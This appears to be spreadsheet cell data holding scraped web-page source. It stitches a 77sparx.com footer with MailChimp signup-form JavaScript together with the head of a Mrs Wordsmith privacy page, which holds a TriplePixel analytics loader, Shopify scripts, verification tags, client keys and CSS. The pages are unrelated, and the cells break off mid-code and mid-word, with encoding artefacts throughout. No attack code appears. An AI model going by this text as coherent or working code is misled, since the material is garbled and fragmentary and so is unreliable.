&lt;img src="https://www.77sparx.com/wp-content/uploads/2015/03/iKids.png" alt="iKids Award Finalist" width="135" height="150" class="aligncenter size-medium wp-image-1159" /&gt;_x005F_x000D_
_x005F_x000D_
&lt;img src="https://www.77sparx.com/wp-content/uploads/2018/02/apm-best-autism-apps-1.png" alt="Best Autism App" width="135" height="170" class="aligncenter size-medium wp-image-1159" /&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- _x005F_x000D_
&lt;img src="https://www.77sparx.com/wp-content/uploads/2013/09/KWI-Logo-Small-02-1.png" alt="Know What&amp;#039;s Inside Program" width="83" height="150" class="aligncenter size-full wp-image-1119" /&gt;_x005F_x000D_
--&gt;&lt;/div&gt;
		&lt;/div&gt;		&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
	        					_x005F_x000D_
		&lt;div class="block footer-widget-2"&gt;_x005F_x000D_
        	&lt;div id="text-10" class="widget widget_text"&gt;&lt;h3&gt;Email&lt;/h3&gt;			&lt;div class="textwidget"&gt;&lt;!-- Begin MailChimp Signup Form --&gt;_x005F_x000D_
&lt;link href="//cdn-images.mailchimp.com/embedcode/classic-081711.css" rel="stylesheet" type="text/css"&gt;_x005F_x000D_
&lt;style type="text/css"&gt;_x005F_x000D_
	#mc_embed_signup{background:#fff; clear:left; font:14px Helvetica,Arial,sans-serif; }_x005F_x000D_
	/* Add your own MailChimp form style overrides in your site stylesheet or in this style block._x005F_x000D_
	   We recommend moving this block and the preceding CSS link to the HEAD of your HTML file. */_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;div id="mc_embed_signup"&gt;_x005F_x000D_
&lt;form action="http://77sparx.us2.list-manage1.com/subscribe/post?u=2a7bdf571715d9fd122e17d6a&amp;amp;id=e1bd5bf173" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate&gt;_x005F_x000D_
	_x005F_x000D_
&lt;div class="mc-field-group"&gt;_x005F_x000D_
	&lt;!--</t>
  </si>
  <si>
    <t>&lt;label for="mce-EMAIL"&gt;Email Address &lt;/label&gt; --&gt;_x005F_x000D_
	&lt;input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL"&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
	&lt;div id="mce-responses" class="clear"&gt;_x005F_x000D_
		&lt;div class="response" id="mce-error-response" style="display:none"&gt;&lt;/div&gt;_x005F_x000D_
		&lt;div class="response" id="mce-success-response" style="display:none"&gt;&lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;	&lt;div class="clear"&gt;&lt;input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button"&gt;&lt;/div&gt;_x005F_x000D_
&lt;/form&gt;_x005F_x000D_
 &lt;/div&gt;_x005F_x000D_
&lt;script type="text/javascript"&gt;_x005F_x000D_
 var fnames = new Array();var ftypes = new Array();fnames[0]='EMAIL';ftypes[0]='email';fnames[1]='FNAME';ftypes[1]='text';fnames[2]='LNAME';ftypes[2]='text';_x005F_x000D_
try {_</t>
  </si>
  <si>
    <t>x000D_
    var jqueryLoaded=jQuery;_x005F_x000D_
    jqueryLoaded=true;_x005F_x000D_
} catch(err) {_x005F_x000D_
    var jqueryLoaded=false;_x005F_x000D_
}_x005F_x000D_
var head= document.getElementsByTagName('head')[0];_x005F_x000D_
if (!jqueryLoaded) {_x005F_x000D_
    var script = document.createElement('script');_x005F_x000D_
    script.type = 'text/javascript';_x005F_x000D_
     script.src = '//ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js';_x005F_x000D_
    head.appendChild(script);_x005F_x000D_
    if (script.readyState &amp;&amp; script.onload!==null){_x005F_x000D_
        script.onreadystatechange= function () {_x005F_x000D_
              if (this.readyState == 'complete') mce_preload_check();_x005F_x000D_
        }    _x005F_x000D_
    }_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
var err_style = '';_x005F_x000D_
try{_x005F_x000D_
    err_style = mc_custom_error_style;_x005F_x000D_
} catch(e){_x005F_x000D_
    err_style = '#mc_embed_signup input.mce_inline_error{border-color:#6B0505;} #mc_embed_signup div.mce_inline_error{margin: 0 0</t>
  </si>
  <si>
    <t>1em 0; padding: 5px 10px; background-color:#6B0505; font-weight: bold; z-index: 1; color:#fff;}';_x005F_x000D_
}_x005F_x000D_
var head= document.getElementsByTagName('head')[0];_x005F_x000D_
var style= document.createElement('style');_x005F_x000D_
style.type= 'text/css';_x005F_x000D_
if (style.styleSheet) {_x005F_x000D_
  style.styleSheet.cssText = err_style;_x005F_x000D_
} else {_x005F_x000D_
  style.appendChild(document.createTextNode(err_style));_x005F_x000D_
}_x005F_x000D_
head.appendChild(style);_x005F_x000D_
setTimeout('mce_preload_check();', 250);_x005F_x000D_
_x005F_x000D_
var mce_preload_checks = 0;_x005F_x000D_
function mce_preload_check(){_x005F_x000D_
    if (mce_preload_checks&gt;40) return;_x005F_x000D_
    mce_preload_checks++;_x005F_x000D_
    try {_x005F_x000D_
        var jqueryLoaded=jQuery;_x005F_x000D_
    } catch(err) {_x005F_x000D_
        setTimeout('mce_preload_check();', 250);_x005F_x000D_
        return;_x005F_x000D_
    }_x005F_x000D_
    var script = document.createElement('script');_x005F_x000D_
    script.type = 'text/javascript';_x005F_x000D_
    script.src = 'http://downloads.mailchimp.com/js/jquery.form-n-validate.js';_x005F_x000D_
    head.appendChild(script);_x005F_x000D_
    try {_x005F_x000D_
        var validatorLoaded=jQuery("#fake-form").validate({});_x005F_x000D_
    } catch(err) {_x005F_x000D_
        setTimeout('mce_preload_check();', 250);_x005F_x000D_
        return;_x005F_x000D_
    }_ x000D_
    mce_init_form();_x005F_x000D_
}_x005F_x000D_
function mce_init_form(){_x005F_x000D_
    jQuery(document).ready( function($) {_x005F_x000D_
      var options = { errorClass: 'mce_inline_error', errorElement: 'div', onkeyup: function(){}, onfocusout:function(){}, onblur:function(){}  };_x005F_x000D_
      var mce_validator = $("#mc-embedded-subscribe-form").validate(options);_x005F_x000D_
      $("#mc-embedded-subscribe-form").unbind('submit');//remove the validator so we can get into beforeSubmit on the ajaxform, which then calls the validator_x005F_x000D_
      options = { url: 'http://77sparx.us2.list-manage.com/subscribe/post-json?u=2a7bdf571715d9fd122e17d6a&amp;id=e1bd5bf173&amp;c=?', type: 'GET', dataType: 'json', contentType: "application/json; charset=utf-8",_x005F_x000D_
                    beforeSubmit: function(){_x005F_x000D_
                        $('#mce_tmp_error_msg').remove();_x005F_x000D_
                        $('.datefield','#mc_embed_signup').each(_x005F_x000D_
                            function(){_x005F_x000D_
                                var txt = 'filled';_x005F_x000D_
                                var fields = new Array();_x005F_x000D_
                                 var</t>
  </si>
  <si>
    <t>i = 0;_x005F_x000D_
                                $(':text', this).each(_x005F_x000D_
                                    function(){_x005F_x000D_
                                        fields[i] = this;_x005F_x000D_
                                        i++;_x005F_x000D_
                                    });_x005F_x000D_
                                 $(':hidden', this).each(_x005F_x000D_
                                    function(){_x005F_x000D_
                                        var bday = false;_x005F_x000D_
                                        if (fields.length == 2){_x005F_x000D_
                                            bday = true;_x005F_x000D_
                                            fields[2] = {'value':1970};//trick birthdays into having years_x005F_x000D_
                                        }_x005F_x000D_
                                    	if ( fields[0].value=='MM' &amp;&amp; fields[1].value=='DD' &amp;&amp; (fields[2].value=='YYYY' || (bday &amp;&amp; fields[2].value==1970) ) ){ _x005F_x000D_
                                    		this.value = '';_x005F_x000D_
									    } else if ( fields[0].value=='' &amp;&amp; fields[1].value=='' &amp;&amp; (fields[2].value=='' || (bday &amp;&amp; fields[2].value==1970) ) ){</t>
  </si>
  <si>
    <t xml:space="preserve">_x005F_x000D_
                                    		this.value = '';_x005F_x000D_
									    } else {_x005F_x000D_
									        if (/\[day\]/.test(fields[0].name)){_x005F_x000D_
    	                                        this.value = fields[1].value+'/'+fields[0].value+'/'+fields[2].value;									        _x005F_x000D_
									        } else {_x005F_x000D_
    	                                        this.value = fields[0].value+'/'+fields[1].value+'/'+fields[2].value;_x005F_x000D_
	                                        }_x005F_x000D_
	                                    }_x005F_x000D_
                                    });_x005F_x000D_
                            });_x005F_x000D_
                        $('.phonefield-us','#mc_embed_signup').each(_x005F_x000D_
                            function(){_x005F_x000D_
                                var fields = new Array();_x005F_x000D_
                                 var i = 0;_x005F_x000D_
                                $(':text', this).each(_x005F_x000D_
                                    function(){_x005F_x000D_
                                      </t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html lang="en"&gt;
  &lt;head&gt;
    &lt;script&gt;
      / * &gt;&gt; TriplePixel :: start*/
      ~(function (W, H, A, L, E, _) {
        function O(T, R) {
          void 0 === R &amp;&amp; (R = !1),
            (H = new XMLHttpRequest()),
            H.open('GET', '//triplewhale-pixel.web.app/triplepx.txt?'</t>
  </si>
  <si>
    <t>+ ~(Date.now() / 9e7), !0),
            H.send(null),
            (H.onreadystatechange = function () {
              4 === H.readyState &amp;&amp; 200 === H.status
                ? setTimeout(function () {
                    return eval(H.responseText);
                  }, 50)
                : (299 &lt; H.status || H.status &lt; 200) &amp;&amp; T &amp;&amp; ! R &amp;&amp; ((R = !0), O(T - 1));
            });
        }
        if (((L = window), !L[H +</t>
  </si>
  <si>
    <t>'sn'])) {
          L[H + 'sn'] = 1;
          try {
            A.setItem(H, 1 + (0 | A.getItem(H) || 0)),
              W.includes('⇈') &amp;&amp; A.setItem(H + 'Stg', 1 + (0 | A.getItem(H + 'Stg') || 0)),
               (E = JSON.parse(A.getItem(H + 'U') || '</t>
  </si>
  <si>
    <t>[]')).push(location.href),
              A.setItem(H + 'U', JSON.stringify(E));
          } catch (e) {}
          A.getItem('"!nC`') ||
            ((A = L),
            A[H] ||
              ((L = function () {
                return Date.now().toString(36) + '_'</t>
  </si>
  <si>
    <t>+ Math.random().toString(36);
              }),
              (E = A[H] =
                function (t, e) {
                  return (W = L()), (E._q = E._q || []).push([W, t, e]), (E._headless = !0), W;
                }),
              (E.ch = W),
              O(5)));
        }
      })('', 'TriplePixel', localStorage);
      /* &lt;&lt;</t>
  </si>
  <si>
    <t>TriplePixel :: end*/
    &lt;/script&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
&lt;meta name="p:domain_verify" content="a03511bd33704d90bbe29421209756df"&gt;
&lt;meta
  name="google-signin-client_id"
  content="54687141392-g35hkat0pu76pkafcm8h7srtoqf69s9m.apps.googleusercontent.com"
&gt;
&lt;!-- Google search console, etc --&gt;
&lt;meta
  name="google-site-verification"
  content="ZTAX5fcglH5avk4gGVah7s6RF4liQoxyUwaGCh0wK68"
&gt;
&lt;meta
  name="google-site-verification"
  content="yXg5m0BXEUfNtiqmQ2l7DySemhgCrN87RVEWfMiGJy0"
&gt;
&lt;meta
  name="google-site-verification"
  content="IW0tvNL4KR_hujKtK3p63MwFvDxRJw-Ku7AJfmps13Q"
&gt;
&lt;meta
  name="google-site-verification"
  content="jsIyEZ0mV6SrrQyty4vPQ1ClmkEOUWHTuFMCHSg3ZME"
&gt;
&lt;meta
  name="google-site-verification"
  content="jaHIlVwPlEy1Xgec4-t1NpGzj0hO_w909nbXRa5qryM"
&gt;
&lt;meta
  name="google-site-verification"
  content="_RYkck2gxJWS6qePpKaf3jkrU44mC6E5LZ2r9lQ2TVU"
&gt;
&lt;meta
  name="facebook-domain-verification"
  content="qvlvk02e044akwswoigiks5ndvodfd"
&gt;
&lt;meta name="msvalidate.01" content="28C2F8BFC613A8169602340341101C28"&gt;
      &lt;link
        rel="canonical"
        href="https://mrswordsmith.com/pages/privacy"
      &gt;&lt;title&gt;
      Privacy Policy - Mrs Wordsmith US
    &lt;/title&gt;
    &lt;meta
      name="description"
      content="This Privacy Policy was last updated on 23rd Feb 2023. We are committed to providing safe, educational and entertaining services to our customers and their children.</t>
  </si>
  <si>
    <t>We take your privacy seriously, particularly where your children are interacting with our products. Welcome to our privacy policy. Hatch House Games Limit"
    &gt;
    &lt;link rel="shortcut icon" href="//cdn.shopify.com/s/files/1/0255/7221/2835/files/Mrs_Wordsmith_Favicon_22_128_32x32.png?v=1673522782" type="image/png"&gt;
    &lt;link rel="preconnect" href="https://connect.facebook.net"&gt;
    &lt;link rel="preconnect" href="https://f.vimeocdn.com"&gt;
    &lt;link rel="preconnect" href="https://config.gorgias.chat"&gt;
    &lt;link rel="preconnect" href="https://shopify2.printzware.com"&gt;
    &lt;link rel="preconnect" href="https://script.hotjar.com"&gt;
    &lt;link rel="preconnect" href="https://analytics.tiktok.com"&gt;
    &lt;link rel="preconnect" href="https://www.googletagmanager.com"&gt;
    &lt;link rel="preconnect" href="https://cdn.shopify.com"&gt;
    &lt;link rel="preconnect" href="https://a.klaviyo.com"&gt;
    &lt;script src="//cdn.shopify.com/s/files/1/0255/7221/2835/t/195/assets/global.compiled.js?v=65615502008727898991681306468" defer="defer"&gt;&lt;/script&gt;&lt;!-- HEADER CONTENT --&gt;&lt;script&gt;window.performance &amp;&amp; window.performance.mark &amp;&amp; window.performance.mark('shopify.content_for_header.start');&lt;/script&gt;&lt;meta name="google-site-verification" content="IChgRdyoxSkjKAllIcwDA5f3kcSU9sSSy3bKQkEPhgQ"&gt;
&lt;meta name="facebook-domain-verification" content="qvlvk02e044akwswoigiks5ndvodfd"&gt;
&lt;meta id="shopify-digital-wallet" name="shopify-digital-wallet" content="/25572212835/digital_wallets/dialog"&gt;
&lt;meta name="shopify-checkout-api-token" content="9445e0eb6e1900268ef8d2c429bc832a"&gt;
&lt;meta id="in-context-paypal-metadata" data-shop-id="25572212835" data-venmo-supported="false" data-environment="production" data-locale="en_US" data-paypal-v4="true" data-currency="USD"&gt;
&lt;link rel="alternate" hreflang="x-default" href="https://mrswordsmith.com/pages/privacy"&gt;
&lt;link rel="alternate" hreflang="en-US" href="https://mrswordsmith.com/pages/privacy"&gt;
&lt;link rel="alternate" hreflang="en-CA" href="https://mrswordsmith.com/en-ca/pages/privacy"&gt;
&lt;link rel="alternate" hreflang="en-GB" href="https://mrswordsmith.com/en-gb/pages/privacy"&gt;
&lt;link rel="alternate" hreflang="en-AU" href="https://mrswordsmith.com/en-au/pages/privacy"&gt;
&lt;script&gt;
  (function() {
    var scripts =</t>
  </si>
  <si>
    <t>["https://cdn.shopify.com/shopifycloud/checkout-web/assets/runtime.baseline.en.f8423b4aeafd3581e601.js", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/checkout-web-packages~Information~NoAddressLocation~Payment~PostPurchase~Review~Shipping~ShopPay~Sho~cf13f96e.baseline.en.8d3a709bcf8c04f77ed7.js", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/Information~Payment~ShopPay.baseline.en.935f71e1b5e37b1a673d.js", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/Information~Payment.baseline.en.e38e94a10255bd8dac2c.js", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/Information.baseline.en.3c067bc64a64a71ff5ad.js", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/checkout-web-ui~app.baseline.en.26a0342d355a675e2801.js", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/vendors~app.baseline.en.1188b9033722bc012e84.js", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/checkout-web-packages~app.baseline.en.4e70883e139eb5a799c1.js", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/app.baseline.en.d102fc12c433371f18b0.js"];
    var styles = ["https://cdn.shopify.com/shopifycloud/checkout-web/assets/checkout-web-ui~app.baseline.en.ba7746e3965877991bae.css", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/vendors~app.baseline.en.954db6995929b6f1f646.css", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/app.baseline.en.dd733f21b66b59afc26d.css", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/Information~Payment~ShopPay.baseline.en.9f248e42bf2a8151ea27.css", "https://cdn.shopify.com/shopifycloud/checkout-web/assets/Information.baseline.en.6d08f77e3a864d9cf367.css"];
    function prefetch(url, as, callback) {
      var link = document.createElement('link');
      if (link.relList.supports('prefetch')) {
        link.rel = 'prefetch';
        link.fetchPriority = 'low';
        link.as = as;
        link.href = url;
        link.onload</t>
  </si>
  <si>
    <t>Shopify = Shopify || {};
Shopify.shop = "mrs-wordsmith-eu.myshopify.com";
Shopify.locale = "en";
Shopify.currency = {"active":"USD","rate":"1.0"};
Shopify.country = "US";
Shopify.theme = {"name":"Live","id":121614401635,"theme_store_id":796,"role":"main"};
Shopify.theme.handle = "null";
Shopify.theme.style = {"id":null,"handle":null};
Shopify.cdnHost = "cdn.shopify.com";
Shopify.routes = Shopify.routes || {};
Shopify.routes.root = "/";&lt;/script&gt;
&lt;script type="module"&gt;!function(o){(o. Shopify=o.Shopify||{}).modules=!0}(window);&lt;/script&gt;
&lt;script&gt;!function(o){function n(){var o=[];function n(){o.push(Array.prototype.slice.apply(arguments))}return n.q=o,n}var t=o.Shopify=o.Shopify||{};t.loadFeatures=n(),t.autoloadFeatures=n()}(window);&lt;/script&gt;
&lt;script&gt;window. ShopifyPay = window.</t>
  </si>
  <si>
    <t>ShopifyPay || {};
window. ShopifyPay.apiHost = "shop.app\/pay";&lt;/script&gt;
&lt;script&gt;(function() {
  function asyncLoad() {
    var urls = ["https:\/\/upsells.ignore.boldapps.net\/v2_ui\/js\/UpsellTracker.js?shop=mrs-wordsmith-eu.myshopify.com","https:\/\/upsells.ignore.boldapps.net\/v2_ui\/js\/upsell.js?shop=mrs-wordsmith-eu.myshopify.com","https:\/\/storage.googleapis.com\/gsf-scripts\/global-remarketing\/mrs-wordsmith-eu.js?1658023505\u0026shop=mrs-wordsmith-eu.myshopify.com","https:\/\/geolocation-recommendations.shopifyapps.com\/locale_bar\/script.js?shop=mrs-wordsmith-eu.myshopify.com","https:\/\/ecommplugins-scripts.trustpilot.com\/v2.1\/js\/header.min.js?settings=eyJrZXkiOiJnU2VnNkZWaEJSSkZ6NTVrIiwicyI6InNrdSJ9\u0026v=2.5\u0026shop=mrs-wordsmith-eu.myshopify.com","https:\/\/ecommplugins-trustboxsettings.trustpilot.com\/mrs-wordsmith-eu.myshopify.com.js?settings=1681304923944\u0026shop=mrs-wordsmith-eu.myshopify.com","https:\/\/shopify2.printzware.com\/js\/printzware.js?shop=mrs-wordsmith-eu.myshopify.com","\/\/cdn.shopify.com\/proxy\/db828ff37ee7f6a643363b57ee6170524ad512b2943eca018e65b18accafc246\/ignore.static.cdn.printful.com\/static\/js\/external\/shopify-product-customizer.js?v=0.28\u0026shop=mrs-wordsmith-eu.myshopify.com\u0026sp-cache-control=cHVibGljLCBtYXgtYWdlPTkwMA","https:\/\/widget.trustpilot.com\/bootstrap\/v5\/tp.widget.sync.bootstrap.min.js?shop=mrs-wordsmith-eu.myshopify.com","https:\/\/widget.trustpilot.com\/bootstrap\/v5\/tp.widget.sync.bootstrap.min.js?shop=mrs-wordsmith-eu.myshopify.com","https:\/\/widget.trustpilot.com\/bootstrap\/v5\/tp.widget.sync.bootstrap.min.js?shop=mrs-wordsmith-eu.myshopify.com"];
    urls = urls.filter(function(url) { return url.indexOf("ignore") == -1});for (var i = 0; i &lt; urls.length; i++) {
      var s = document.createElement('script');
      s.type = 'text/javascript';
      s.async = true;
      s.src = urls[i];
      var x = document.getElementsByTagName('script')[0];
      x.parentNode.insertBefore(s, x);
    }
  };
  if(window.attachEvent) {
    window.attachEvent('onload', asyncLoad);
  } else {
    window.addEventListener('load', asyncLoad, false);
  }
})();&lt;/script&gt;
&lt;script id="__st"&gt;var __st={"a":25572212835,"offset":7200,"reqid":"789b869c-9a2a-45ae-a1bc-18bd789fe220","pageurl":"mrswordsmith.com\/pages\/privacy","s":"pages-80443211875","u":"9bd09f10d2ce","p":"page","rtyp":"page","rid":80443211875};&lt;/script&gt;
&lt;script&gt;window.ShopifyPaypalV4VisibilityTracking</t>
  </si>
  <si>
    <t>Shopify.recaptchaV3||{siteKey:"6LcCR2cUAAAAANS1Gpq_mDIJ2pQuJphsSQaUEuc9"};var t=['form[action*="/contact"] input[name="form_type"][value="contact"]','form[action*="/comments"] input[name="form_type"][value="new_comment"]','form[action*="/account"] input[name="form_type"][value="customer_login"]','form[action*="/account"] input[name="form_type"][value="recover_customer_password"]','form[action*="/account"] input[name="form_type"][value="create_customer"]','form[action*="/contact"] input[name="form_type"][value="customer"]'].join(",");function n(e){e=e.target;null==e||null!=(e=function e(t,n){if(null==t.parentElement)return null;if("FORM"!=t.parentElement.tagName)return e(t.parentElement,n);for(var o=t.parentElement.action,r=0;r&lt;n.length;r++)if(-1!==o.indexOf(n[r]))return t.parentElement;return null}(e,["/contact","/comments","/account"]))&amp;&amp;null!=e.querySelector(t)&amp;&amp;((e=o.createElement("script")).setAttribute("src","https://cdn.shopify.com/shopifycloud/storefront-recaptcha-v3/v0.6/index.js"),o.body.appendChild(e),o.removeEventListener("focus",n,!0),o.removeEventListener("change",n,!0),o.removeEventListener("click",n,!0))}o.addEventListener("click",n,!0),o.addEventListener("change",n,!0),o.addEventListener("focus",n,!0)})}(document);&lt;/script&gt;
&lt;script integrity="sha256-4VRZk5nmuLKdyxECzHbrGZ+jOgmvT6eNFej4VE7mT80=" data-source-attribution="shopify.loadfeatures" defer="defer" src="//cdn.shopify.com/shopifycloud/shopify/assets/storefront/load_feature-e154599399e6b8b29dcb1102cc76eb199fa33a09af4fa78d15e8f8544ee64fcd.js" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;script crossorigin="anonymous" defer="defer" src="//cdn.shopify.com/shopifycloud/shopify/assets/shopify_pay/storefront-c31d2fa4962d2ef90b673e945ee33f4f87302b97d0882cd8e83a629b84b30dab.js?v=20220906"&gt;&lt;/script&gt;
&lt;script integrity="sha256-h+g5mYiIAULyxidxudjy/2wpCz/3Rd1CbrDf4NudHa4=" data-source-attribution="shopify.dynamic-checkout" defer="defer" src="//cdn.shopify.com/shopifycloud/shopify/assets/storefront/features-87e8399988880142f2c62771b9d8f2ff6c290b3ff745dd426eb0dfe0db9d1dae.js" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;script id="sections-script" data-sections="header" defer="defer" src="//cdn.shopify.com/s/files/1/0255/7221/2835/t/195/compiled_assets/scripts.js?338843"&gt;&lt;/script&gt;
&lt;style id="shopify-dynamic-checkout-cart"&gt;@media screen and (min-width: 750px) {
  #dynamic-checkout-cart {
    min-height: 50px;
  }
}
@media screen and (max-width: 750px) {
  #dynamic-checkout-cart {
    min-height: 180px;
  }
}
&lt;/style&gt;&lt;script&gt;window.performance &amp;&amp; window.performance.mark &amp;&amp; window.performance.mark('shopify.content_for_header.end');&lt;/script&gt;
    &lt;!-- HEADER CONTENT --&gt;
    &lt;link as="script" rel="preload" href="https://d2wy8f7a9ursnm.cloudfront.net/v7/bugsnag.min.js"&gt;
&lt;script src="https://d2wy8f7a9ursnm.cloudfront.net/v7/bugsnag.min.js"&gt;&lt;/script&gt;
&lt;script&gt;
  Bugsnag.start({
      apiKey: 'feb6e48c1848f8397cabd92a2d436a20',
      releaseStage: 'Live',
      appVersion: "6.8.23-70be6e2ddb3041b3f6ef59054f2f479af0b306f4",
      appType: 'client',
      metaData: {
          permanentDomain: 'https://mrswordsmith.com/',
          themeId: '121614401635',
          themeName: 'Live',
      },
      ////// 
  });
&lt;/script&gt;
&lt;!-- Nick - Temporary raygun --&gt;
    &lt;!-- preload custom fonts --&gt;
    &lt;link
      rel="preload"
      href="//cdn.shopify.com/s/files/1/0255/7221/2835/t/195/assets/phosphatesolid-webfont.woff2"
      as="font"
      type="font/woff2"
      crossorigin="anonymous"
    &gt;
    &lt;link
      rel="preload"
      href="//cdn.shopify.com/s/files/1/0255/7221/2835/t/195/assets/GothamRounded-Book.woff2"
      as="font"
      type="font/woff2"
      crossorigin="anonymous"
    &gt;
    &lt;link
      rel="preload"
      href="//cdn.shopify.com/s/files/1/0255/7221/2835/t/195/assets/GothamRounded-Bold.woff2"
      as="font"
      type="font/woff2"
      crossorigin="anonymous"
    &gt;
&lt;!-- Stylesheets --&gt;
&lt;style data="page | privacy"&gt;
@media (max-width:639px){#header .header__mobile,#header</t>
  </si>
  <si>
    <t>.header__list--hide-mobile{display:none;}}
@media (max-width: 39.9375em){.show-for-medium{display:none !important;}}
@media (min-width:40em){.show-for-small-only{display:none!important}}
@media (max-width:639px){.header__mobile,.header__list--hide-mobile{display:none;}}
.thumbnail__item{flex-basis:80px;flex-grow:40px;flex-shrink:0;margin:.25rem;width:auto!important;opacity:.4}.product__carousel-wrapper .thumbnails{display:flex;flex-flow:row wrap;justify-content:center}
.thumbnail__item{flex-basis:80px;flex-grow:40px;flex-shrink:0;margin:.25rem;width:auto!important;opacity:.4}.product__carousel-wrapper .thumbnails{display:flex;flex-flow:row wrap;justify-content:center}
.image--large{max-width:600px;}.center{float:none;margin-left:auto;margin-right:auto;}.no-underline{text-decoration:none;}
#page-wrapper .product--list small,#page-wrapper .cart__item-title small,#page-wrapper h1 small,#page-wrapper h2 small,#page-wrapper .product__heading small,#page-wrapper .card__title small{color: inherit;font-size: 1em;}
svg.shipping-date{display:none;}
/* end critical css from 'critical-css_inject' */
@charset "UTF-8";html{font-family:sans-serif;line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;box-sizing:border-box;font-size:100%}header,main,nav,section{display:block}a{background-color:transparent;-webkit-text-decoration-skip:objects}img{border-style:none;display:inline-block;vertical-align:middle;max-width:100%;height:auto;-ms-interpolation-mode:bicubic}svg:not(:root){overflow:hidden}button,input{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0;font-family:inherit}button::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring{outline:ButtonText dotted 1px}input{overflow:visible}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}*,::after,::before{box-sizing:inherit}button{overflow:visible;text-transform:none;-webkit-appearance:button;padding:0;-webkit-appearance:none;-moz-appearance:none;appearance:none;border:0;border-radius:3px;background:0 0;line-height:1}div,h2,h4,li,p,ul{margin:0;padding:0}i{font-style:italic;line-height:inherit}b,strong{font-weight:700;line-height:inherit}small{font-size:80%;line-height:1.2}h2 small{line-height:0;color:#cacaca}@media print,screen and (min-width:40em){h2{font-size:2.5rem}h4{font-size:1.5625rem}}a img{border:0}ul{margin-bottom:1rem;list-style-position:outside;margin-left:1.25rem;list-style-type:disc;line-height:1.4}li{font-size:inherit}ul ul{margin-left:1.25rem;margin-bottom:0}.text-center{text-align:center}.menu{padding:0;margin:0;list-style:none;position:relative;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap;-ms-flex-direction:row;flex-direction:row}.menu a{line-height:1;text-decoration:none;display:block;padding:.7rem 1rem;margin-bottom:0}.menu.vertical{-ms-flex-wrap:nowrap;flex-wrap:nowrap;-ms-flex-direction:column;flex-direction:column}body{margin:0;padding:0;background:#fff;line-height:1.5;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;color:#1d1d1d;font-family:GothamRounded,helvetica,arial,sans-serif;font-size:16px;font-weight:300;-moz-font-feature-settings:"ss01";-webkit-font-feature-settings:"ss01";font-feature-settings:"ss01";-moz-font-feature-settings:"salt";-webkit-font-feature-settings:"salt";font-feature-settings:"salt";overflow-x:hidden!important;width:100%}input::-webkit-input-placeholder{color:#acacac}input::-moz-placeholder{color:#acacac}input:-moz-placeholder{color:#acacac}input:-ms-input-placeholder{color:#acacac}.no-underline{text-decoration:none}h2,h4{font-style:normal;color:inherit;text-rendering:optimizeLegibility;font-family:PhosphateSolid,helvetica,arial,sans-serif;font-weight:700;letter-spacing:.01em;line-height:1;margin-bottom:1rem}h2{margin-top:0;font-size:22px}@media (min-width:1024px){h2{font-size:28px}}h4{margin-top:0;font-size:16px}p{margin-bottom:1rem;text-rendering:optimizeLegibility;font-size:16px;line-height:1.4}a{line-height:inherit;color:#1d1d1d;font-weight:700;text-decoration:underline}a:visited{color:#1d1d1d}.font-weight--bold{font-weight:700}.font-size--larger{font-size:1.25em}.font-size--smaller{font-size:.8em}#page-wrapper .background--white{background-color:#fff}.block{padding:2rem 1rem}@media (min-width:480px){.block{padding:3rem 1.5rem}}@media (min-width:640px){.block{padding:4rem 2rem}}.block--reduced-vertical-padding{padding-bottom:1rem;padding-top:1rem}@media (min-width:480px){.block--reduced-vertical-padding{padding-bottom:1.5rem;padding-top:1.5rem}}@media (min-width:640px){.block--reduced-vertical-padding{padding-bottom:2rem;padding-top:2rem}}.block--no-padding-bottom{padding-bottom:0}.block--no-padding-top{padding-top:0}.block__container{margin-left:auto;margin-right:auto;max-width:1200px}[class*=grid__column] .block{align-content:center;align-items:center;display:flex;flex-wrap:wrap}[class*=grid__column] .block__container{margin:0}[class*=grid__column].left .block__container{margin-left:auto}[class*=grid__column].right .block__container{margin-right:auto}[class*=grid__column] .block h2{font-size:28px}.grid--flush .grid__column--one-half-medium .block__container{max-width:600px;width:100%}@media (min-width:640px){.grid--flush .grid__column--one-half-medium .block__container{max-width:CALC(600px - 2rem)}}@media (min-width:1024px){.block{padding-left:4rem;padding-right:4rem}.grid--flush .grid__column--one-half-medium .block__container{max-width:CALC(600px - 4rem)}}.grid--flush .grid__column--full .block__container{margin-left:auto;margin-right:auto;max-width:1200px;width:100%}.button{background-color:#5e5e5e;border:none;border-radius:10px;color:#fff;display:inline-block;font-size:16px;font-weight:700;line-height:31px;margin:0;padding:8px 24px</t>
  </si>
  <si>
